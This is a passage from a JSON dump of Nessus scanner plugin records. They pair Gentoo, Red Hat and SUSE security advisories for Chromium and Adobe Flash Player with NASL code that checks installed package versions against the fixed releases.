in Chromium. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 20, "published": "2014-12-15T00:00:00", "title": "GLSA-201412-13 : Chromium: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3200", "CVE-2014-7899", "CVE-2014-3192", "CVE-2014-3193", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-3194", "CVE-2014-3198", "CVE-2014-7901", "CVE-2014-3199", "CVE-2014-7903", "CVE-2014-3189", "CVE-2014-3191", "CVE-2014-7910", "CVE-2014-3195", "CVE-2014-3197", "CVE-2014-3190", "CVE-2014-3188", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2014-12-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chromium"], "id": "GENTOO_GLSA-201412-13.NASL", "href": "https://www.tenable.com/plugins/nessus/79966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-13.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79966);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-3188\", \"CVE-2014-3189\", \"CVE-2014-3190\", \"CVE-2014-3191\", \"CVE-2014-3192\", \"CVE-2014-3193\", \"CVE-2014-3194\", \"CVE-2014-3195\", \"CVE-2014-3197\", \"CVE-2014-3198\", \"CVE-2014-3199\", \"CVE-2014-3200\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_bugtraq_id(70262, 70273, 71158, 71159, 71160, 71161, 71163, 71164, 71165, 71166, 71168, 71170);\n script_xref(name:\"GLSA\", value:\"201412-13\");\n\n script_name(english:\"GLSA-201412-13 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-13\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-39.0.2171.65'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 39.0.2171.65\"), vulnerable:make_list(\"lt 39.0.2171.65\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:15:08", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-24, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0573, CVE-2014-0574,\nCVE-2014-0576, CVE-2014-0577, CVE-2014-0581, CVE-2014-0582,\nCVE-2014-0584, CVE-2014-0585, CVE-2014-0586, CVE-2014-0588,\nCVE-2014-0589, CVE-2014-0590, CVE-2014-8438, CVE-2014-8440,\nCVE-2014-8441)\n\nThis update also fixes an information disclosure flaw in flash-plugin\nthat could allow a remote attacker to obtain a victim's session\ncookie. (CVE-2014-8437)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.418.", "edition": 25, "published": "2014-11-13T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:1852)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2014-11-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1852.NASL", "href": "https://www.tenable.com/plugins/nessus/79228", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1852. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79228);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\");\n script_bugtraq_id(71033, 71036, 71037, 71038, 71039, 71041, 71042, 71043, 71044, 71045, 71046, 71047, 71048, 71049, 71050, 71051);\n script_xref(name:\"RHSA\", value:\"2014:1852\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:1852)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-24, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0573, CVE-2014-0574,\nCVE-2014-0576, CVE-2014-0577, CVE-2014-0581, CVE-2014-0582,\nCVE-2014-0584, CVE-2014-0585, CVE-2014-0586, CVE-2014-0588,\nCVE-2014-0589, CVE-2014-0590, CVE-2014-8438, CVE-2014-8440,\nCVE-2014-8441)\n\nThis update also fixes an information disclosure flaw in flash-plugin\nthat could allow a remote attacker to obtain a victim's session\ncookie. (CVE-2014-8437)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.418.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-24.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8441\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0590\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8438\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0576\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0577\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0584\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0581\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0589\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0582\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1852\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.418-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.418-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:02", "description": "flash-player was updated to version 11.2.202.418 to fix 18 security\nissues.\n\nThese security issues were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2014-0576, CVE-2014-0581,\n CVE-2014-8440, CVE-2014-8441).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\n - A double free vulnerability that could lead to code\n execution (CVE-2014-0574).\n\n - Type confusion vulnerabilities that could lead to code\n execution (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585,\n CVE-2014-0586, CVE-2014-0590).\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution (CVE-2014-0582, CVE-2014-0589).\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens (CVE-2014-8437).\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level (CVE-2014-0583). \n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442).", "edition": 18, "published": "2014-11-19T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:1444-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2014-11-19T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-683.NASL", "href": "https://www.tenable.com/plugins/nessus/79324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-683.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79324);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:1444-1)\");\n script_summary(english:\"Check for the openSUSE-2014-683 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to version 11.2.202.418 to fix 18 security\nissues.\n\nThese security issues were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2014-0576, CVE-2014-0581,\n CVE-2014-8440, CVE-2014-8441).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\n - A double free vulnerability that could lead to code\n execution (CVE-2014-0574).\n\n - Type confusion vulnerabilities that could lead to code\n execution (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585,\n CVE-2014-0586, CVE-2014-0590).\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution (CVE-2014-0582, CVE-2014-0589).\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens (CVE-2014-8437).\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level (CVE-2014-0583). \n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-11/msg00071.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.418-2.100.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.418-2.100.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.418-2.100.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.418-74.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.418-74.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.418-74.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.418-2.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.418-2.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.418-2.11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:38:32", "description": "flash-player was updated to version 11.2.202.418 to fix 18 security\nissues :\n\n - Memory corruption vulnerabilities that could lead to\n code execution. (CVE-2014-0576 / CVE-2014-0581 /\n CVE-2014-8440 / CVE-2014-8441)\n\n - Use-after-free vulnerabilities that could lead to code\n execution. (CVE-2014-0573 / CVE-2014-0588 /\n CVE-2014-8438)\n\n - A double free vulnerability that could lead to code\n execution. (CVE-2014-0574)\n\n - Type confusion vulnerabilities that could lead to code\n execution. (CVE-2014-0577 / CVE-2014-0584 /\n CVE-2014-0585 / CVE-2014-0586 / CVE-2014-0590)\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution. (CVE-2014-0582 / CVE-2014-0589)\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens. (CVE-2014-8437)\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level. (CVE-2014-0583)\n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442). Further information can be found at\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-24.html .", "edition": 17, "published": "2014-11-18T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9958)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2014-11-18T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-141114.NASL", "href": "https://www.tenable.com/plugins/nessus/79308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79308);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9958)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to version 11.2.202.418 to fix 18 security\nissues :\n\n - Memory corruption vulnerabilities that could lead to\n code execution. (CVE-2014-0576 / CVE-2014-0581 /\n CVE-2014-8440 / CVE-2014-8441)\n\n - Use-after-free vulnerabilities that could lead to code\n execution. (CVE-2014-0573 / CVE-2014-0588 /\n 